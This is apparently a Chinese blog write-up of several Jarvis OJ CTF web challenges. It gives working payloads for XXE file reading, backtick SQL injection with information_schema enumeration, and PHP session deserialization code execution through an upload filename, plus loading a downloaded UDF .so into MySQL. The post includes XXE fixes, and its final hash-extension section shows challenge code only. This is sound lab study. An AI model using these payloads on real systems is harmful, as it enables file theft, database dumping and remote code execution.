- 目录
- xxe实体上传漏洞
- 反引号注入
- PHP session反序列化注入
- mysql 导入.so文件
- hash拓展攻击
- xxe实体上传漏洞
题目链接:
http://web.jarvisoj.com:9882/
题目源码:
function XHR() {
var xhr;
try {xhr = new XMLHttpRequest();}
catch(e) {
var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
for (var i=0,len=IEXHRVers.length;i< len;i++) {
try {xhr = new ActiveXObject(IEXHRVers[i]);}
catch(e) {continue;}
}
}
return xhr;
}
function send(){
evil_input = document.getElementById("evil-input").value;
var xhr = XHR();
xhr.open("post","/api/v1.0/try",true);
xhr.onreadystatechange = function () {
if (xhr.readyState==4 && xhr.status==201) {
data = JSON.parse(xhr.responseText);
tip_area = document.getElementById("tip-area");
tip_area.value = data.task.search+data.task.value;
}
};
xhr.setRequestHeader("Content-Type","application/json");
xhr.send('{"search":"'+evil_input+'","value":"own"}');
}
代码是一个AJXA异步post上传.
这里看了题解才知道是xxe实体上传漏洞.
之前没见过,所以写下博客记录一下.
首先随便输入123.
得到request
包
POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://web.jarvisoj.com:9882/
Content-Length: 30
Cookie: UM_distinctid=1633abd2b6a7df-048c43202bcb36-1269624a-1fa400-1633abd2b6c1100
Connection: keep-alive
{"search":"123","value":"own"}
response
包
HTTP/1.0 201 CREATED
Content-Type: application/json
Content-Length: 80
Server: Werkzeug/0.9.4 Python/2.7.6
Date: Wed, 18 Jul 2018 08:17:06 GMT
{
"task": {
"done": false,
"search": "123",
"value": "own"
}
}
当然这跟本题无关.
既然是xxe
实体上传漏洞,那么首先将request
包的Content-Type: application/json
修改为Content-Type: application/xml
.
但是这里发现只要Content-Type
不是application/json
就能完成读取,建议修改后端代码.
那么这里就要构造一个xml文件.
首先xml
声明:
<?xml version="1.0" ?>
这里题目提示要获得目标机器/home/ctf/flag.txt中的flag值.
那么这里就可以通过引入外部实体的方式远程读取flag.txt中的值.
<!DOCTYPE a [
<!ENTITY b SYSTEM "/home/ctf/flag.txt">
]>
完整xml内容:
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY b SYSTEM "/home/ctf/flag.txt">
]>
<c>&b;</c>
response包
<c>CTF{XxE_15_n0T_S7range_Enough}
</c>
修复方法:
php:
libxml_disable_entity_loader(true);
java:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
the others:
XML External Entity (XXE) Prevention Cheat Sheet
以及过滤关键词,如:system
,<!ENTITY
and so on.
参考文章:
未知攻焉知防——XXE漏洞攻防
XXE注入攻击与防御
【XXE】XXE漏洞攻击与防御
- 反引号注入
题目链接:
http://web.jarvisoj.com:32794/
题目源码:
<?php
require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];
?>
题目提示源码
工具冲鸭
在index.php~下拿到源码
分析主要代码在
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
存在注入
这里可以看到使用了反引号,百度了一下.
通过本地测试,可以得到
1.desc `aaa` `bbb`
2.desc aaa bbb
3.desc 'aaa' 'bbb'
1、2是同样的效果
3无法执行
上面的语句就等同于
1.select * from user bbb where bbb.id = 1
2.select * from `user` `bbb` where bbb.id = 1
那么我们就可以构造
desc `test` `union select 1`
使前面的语句被后面的语句替换,达到查询的目的,但是显示结果只有一条,所以我们利用limit进行跳跃.
查库名 61d300
http://web.jarvisoj.com:32794?table=test` `union select database() limit 1,2
表名 secret_flag,secret_test
http://web.jarvisoj.com:32794?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=0x363164333030 limit 1,2
字段名 flagUwillNeverKnow
http://web.jarvisoj.com:32794?table=test` `union select group_concat(column_name) from information_schema.columns where table_name=0x7365637265745f666c6167 limit 1,2
查flag flag{luckyGame~}
http://web.jarvisoj.com:32794?table=test` `union select flagUwillNeverKnow from secret_flag limit 1,2
- PHP session反序列化注入
题目链接:
http://web.jarvisoj.com:32784/
题目源码:
<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
if(isset($_GET['phpinfo']))
{
$m = new OowoO();
}
else
{
highlight_string(file_get_contents('index.php'));
}
?>
题目提示phpinfo
,尝试输入phpinfo.php
.
http://web.jarvisoj.com:32784/phpinfo.php
发现文件目录/opt/lampp/htdocs
.
PHP session反序列化可以看这里:有趣的php反序列化总结
先本地创建一个test.html
.
<form action="http://web.jarvisoj.com:32784/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" />
</form>
截取上传包如下
-----------------------------306841150525235
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
123
-----------------------------306841150525235
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
-----------------------------306841150525235--
filename
处就可以传入参数了.
首先遍历文件目录
filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:39:\"print_r(scandir(\"/opt/lampp/htdocs/\"));\";}"
得到
Array
(
[0] => .
[1] => ..
[2] => Here_1s_7he_fl4g_buT_You_Cannot_see.php
[3] => index.php
[4] => phpinfo.php
)
这里看到Here_1s_7he_fl4g_buT_You_Cannot_see.php
,猜测flag就在其中,查看文件即可.
filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:73:\"show_source(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\");\";}"
即flag.
"CTF{4d96e37f4be998c50aa586de4ada354a}"
- mysql 导入.so文件
题目链接:
https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172
刚拿到题一脸懵逼,看了writeup
才知道原来有这种操作?????
首先在mysql
的plugin
目录下将文件wget
下来.
usr/lib/mysql/plugin# wget https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172
题目提示help_me函数
,于是创建一个help_me函数
.
mysql> create function help_me returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';
得到如下内容.
mysql> select help_me();
+---------------------------------------------+
| help_me() |
+---------------------------------------------+
| use getflag function to obtain your flag!!
|
+---------------------------------------------+
1 row in set (0.00 sec)
提示getflag,步骤如上.
mysql> create function getflag returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';
Query OK, 0 rows affected (0.01 sec)
mysql> select getflag();
+------------------------------------------+
| getflag() |
+------------------------------------------+
| PCTF{Interesting_U5er_d3fined_Function}
|
+------------------------------------------+
1 row in set (0.00 sec)
- hash拓展攻击
题目链接:
http://web.jarvisoj.com:32778/
题目源码:
<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
body {
background:gray;
text-align:center;
}
</style>
</head>
<body>
<?php
$auth = false;
$role = "guest";
$salt =
if (isset($_COOKIE["role"])) {
$role = unserialize($_COOKIE["role"]);
$hsh = $_COOKIE["hsh"];
if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
$auth = true;
} else {
$auth = false;
}
} else {
$s = serialize($role);
setcookie('role',$s);
$hsh = md5($salt.strrev($s));
setcookie('hsh',$hsh);
}
if ($auth) {
echo "<h3>Welcome Admin. Your flag is
} else {
echo "<h3>Only Admin can see the flag!!</h3>";
}
?>
</body>
</html>
还不快抢沙发